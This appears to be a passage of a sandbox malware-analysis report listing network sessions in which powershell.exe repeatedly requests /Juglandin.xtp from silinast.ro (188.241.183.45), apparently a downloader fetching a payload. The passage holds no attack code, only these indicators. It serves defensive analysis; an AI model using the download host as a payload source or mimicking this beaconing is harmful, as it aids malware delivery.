              Oct 8, 2024 11:02:40.354054928 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.662247188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:44.418354034 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.662248188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:44.446125031 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.662249188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:48.951987982 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.662250188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:48.964099884 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.662251188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:53.156673908 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.662252188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:53.193588972 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.662253188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:57.203972101 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.662254188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:02:57.215179920 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.662255188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:01.235275984 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive
              Oct 8, 2024 11:03:01.539417028 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.662256188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:01.696805000 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.662257188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:05.735538006 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.662258188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:05.746838093 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.662286188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:09.766518116 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.662287188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:09.777503967 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.662288188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:13.819681883 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.662289188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:13.831142902 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.662290188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:17.846098900 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.662291188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:17.861368895 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.662292188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:21.875823975 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.662293188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:21.887191057 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.662297188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:25.922327042 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.662298188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:25.935725927 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.662317188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:30.031838894 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.662318188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:30.042226076 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.662325188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:34.672911882 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.662326188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:34.686928988 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.662327188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:38.706401110 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.662328188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:38.718795061 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.662329188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:42.751023054 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.662330188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:42.767398119 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.662352188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:46.808346987 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.662353188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:46.820125103 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.662367188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:50.851618052 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.662368188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:50.872802973 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.662369188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:54.891944885 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.662370188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:54.903109074 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.662371188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:58.991024017 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.662372188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:03:59.011378050 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.662373188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:03.051415920 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.662374188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:03.062908888 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.662375188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:07.163765907 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.662376188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:07.175585985 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.662377188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:11.206233025 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.662378188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:11.217703104 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.662379188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:15.237845898 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.662380188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:15.250338078 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.662381188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:19.285397053 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.662382188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:19.297791004 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.662383188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:23.439932108 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.662384188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:23.452800989 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              76192.168.2.662387188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:27.487709999 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              77192.168.2.662388188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:27.499104977 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              78192.168.2.662389188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:31.521341085 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              79192.168.2.662390188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:31.535413027 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              80192.168.2.662391188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:35.550025940 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              81192.168.2.662392188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:35.568541050 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.662393188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:39.754349947 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.662394188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:39.767498970 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.662395188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:43.799720049 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.662396188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:43.903882980 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.662397188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:48.454600096 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.662398188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:48.467355013 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.662399188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:52.803606033 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.662400188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:52.817888021 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.662401188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:56.862248898 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.662402188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:04:56.875790119 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.662403188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:00.940125942 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.662404188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:00.955046892 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.662405188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:04.988873005 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.662406188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:05.000705004 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.662407188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:09.035557032 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.662408188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:09.052022934 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.662409188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:13.086461067 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.662410188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:13.104037046 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.662411188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:17.237698078 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.662412188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:17.249528885 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.662413188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:21.284116983 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.662414188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:21.295300007 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.662415188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:25.347069979 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.662416188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:25.359805107 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.662417188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:29.378079891 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.662418188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:29.389225006 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.662419188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:33.438395023 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.662420188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:33.450130939 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              110192.168.2.662421188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:37.503359079 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              111192.168.2.662422188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:37.515322924 CEST74OUTGET /Juglandin.xtp HTTP/1.1
              Host: silinast.ro
              Connection: Keep-Alive


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              112192.168.2.662425188.241.183.45801336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              TimestampBytes transferredDirectionData
              Oct 8, 2024 11:05:41.534184933 CEST74OUTGET /Juglandin.xtp HTTP/1.1
